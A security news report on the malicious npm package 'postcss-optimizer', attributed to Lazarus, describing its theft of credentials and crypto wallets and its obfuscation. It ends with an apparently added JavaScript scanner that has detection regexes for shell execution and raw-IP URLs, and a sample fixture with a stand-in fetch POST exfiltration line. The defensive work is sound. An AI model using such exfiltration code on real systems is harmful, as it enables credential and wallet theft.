In a detailed investigation by Socket security researchers, a new malicious npm package, “postcss-optimizer,” has been linked to the notorious North Korean Advanced Persistent Threat (APT) group Lazarus.
The package, posing as a legitimate open-source dependency, was found to contain malicious code, including the BeaverTail malware, which functions as both an infostealer and a malware loader.
The discovery underscores increasing supply chain risks within open-source ecosystems.
The malicious package, downloaded 477 times before detection, mimics the popular postcss library to deceive developers.
It operates as a sophisticated multi-stage attack, targeting users of Windows, macOS, and Linux systems.
Upon installation, the malware exfiltrates sensitive data, such as credentials, browser cookies, and cryptocurrency wallet files, while also deploying secondary-stage payloads like the InvisibleFerret backdoor.
Behavioral analysis revealed that the package employs obfuscation techniques to evade detection, including variable renaming, string encoding, and control flow flattening.
Infection and Data Exfiltration
The attack relies on impersonation: the package, published under the npm registry alias “yolorabbit,” replicates the structure of the legitimate postcss library, which has over 16 billion downloads.
The malware achieves persistence by modifying registry scripts (Windows) or initiating Python-based commands (macOS/Linux).
Once operational, it exfiltrates data to a hardcoded Command and Control (C2) server, leveraging HTTP POST requests.
Additionally, it retrieves further payloads to reinforce long-term system compromise.
The malware systematically collects system information, such as operating system type, home directory paths, and temporary file locations.
It targets locally stored credentials, browser data, macOS keychains, and cryptocurrency wallet files.
Specific browser extensions for MetaMask, Phantom, Binance Wallet, and Coinbase Wallet are encoded within the script to prioritize cryptocurrency theft.
On macOS, the login keychain is targeted; for Solana wallets, private key directories are accessed directly.
Obfuscation and Persistence
Researchers detected advanced obfuscation methods in the malicious code, including techniques to hinder static analysis.
Dynamic execution paths were used for payload delivery, adapting the methods based on the host operating system for increased effectiveness.
Socket’s automated analysis tools flagged suspicious behaviors, including shell command execution and network communications with the C2 server.
The attack closely mirrors tactics seen in prior Lazarus campaigns, notably their widespread use of staged malware delivery.
Previous incidents involving North Korean APT groups have used similar multi-vector infiltration across software supply chains, such as npm-based attacks documented by Unit 42 researchers in 2022.
This incident highlights the vulnerabilities present in open-source ecosystems and the evolving methodology of state-sponsored cyber actors.
Supply chain compromises, like the postcss-optimizer campaign, jeopardize not only individual developers but also broader organizational networks, making proactive security measures imperative.
To mitigate risks, organizations are urged to adopt automated dependency review systems, such as Socket’s GitHub integration, which scans pull requests for malicious or anomalous behaviors.
Incorporating tools like the Socket CLI ensures open-source dependencies are scrutinized during installations.
Regular audits of software libraries, coupled with real-time threat intelligence, can reduce exposure to such risks.
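The kind of automated pre-install review recommended above can be approximated with a small heuristic scanner keyed to the behaviors this article describes: an install-time lifecycle script, shell command execution, a hardcoded raw-IP C2 URL, string-encoding obfuscation, and a name that wraps a popular library's name. The following is an added example, not Socket's tooling or the malicious package's code; the popular-package shortlist, regex thresholds, and sample package contents are constructed assumptions.

```javascript
// Heuristic triage of an npm package before installation (added example).
// Each signal is a reason for a human to look closer, not a verdict.
const POPULAR = ["postcss", "react", "lodash", "express"]; // assumed shortlist

const CHECKS = [
  // shell execution via child_process
  { id: "shell-exec", re: /child_process|\bexec(?:Sync)?\(|\bspawn(?:Sync)?\(/ },
  // URL pointing at a bare IPv4 address rather than a hostname
  { id: "hardcoded-network", re: /https?:\/\/\d{1,3}(?:\.\d{1,3}){3}/ },
  // runtime code construction
  { id: "dynamic-eval", re: /\beval\(|new Function\(/ },
  // long runs of hex escapes or char-code / base64 decoding
  { id: "string-encoding", re: /(?:\\x[0-9a-f]{2}){8,}|String\.fromCharCode|atob\(/i },
];

// "postcss-optimizer" vs "postcss": a popular name with a bolted-on word.
// Legitimate ecosystem packages (e.g. react-dom) also hit this; it is a signal.
function looksLikeImpersonation(name) {
  const base = name.toLowerCase();
  return POPULAR.some((p) => base !== p && (base.startsWith(p + "-") || base.endsWith("-" + p)));
}

// pkg: parsed package.json; files: { relativePath: sourceText } from the tarball.
function reviewPackage(pkg, files) {
  const findings = [];
  if (looksLikeImpersonation(pkg.name)) findings.push("name: impersonates popular package");
  const scripts = pkg.scripts || {};
  for (const hook of ["preinstall", "install", "postinstall"]) {
    if (scripts[hook]) findings.push(`lifecycle: ${hook} runs "${scripts[hook]}"`);
  }
  for (const [path, src] of Object.entries(files)) {
    for (const c of CHECKS) if (c.re.test(src)) findings.push(`${path}: ${c.id}`);
  }
  return findings;
}

// Constructed sample package (not the real postcss-optimizer contents):
// a postinstall hook, a hex-escaped literal, a shell import, and a raw-IP POST.
const samplePkg = { name: "postcss-optimizer", version: "1.0.0", scripts: { postinstall: "node index.js" } };
const sampleFiles = {
  "index.js": [
    'const { execSync } = require("child_process");',
    'const s = "\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x31\\x30";',
    'fetch("http://203.0.113.10/upload", { method: "POST" });',
  ].join("\n"),
};

console.log(reviewPackage(samplePkg, sampleFiles).join("\n"));
```

In a real pipeline the same function would run over the unpacked tarball from `npm pack` before `npm install`, with findings routed to pull-request review rather than printed.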
This attack illustrates the continued adaptability of Lazarus-linked campaigns, signaling the need for enhanced vigilance in the open-source community to counter these persistent threats.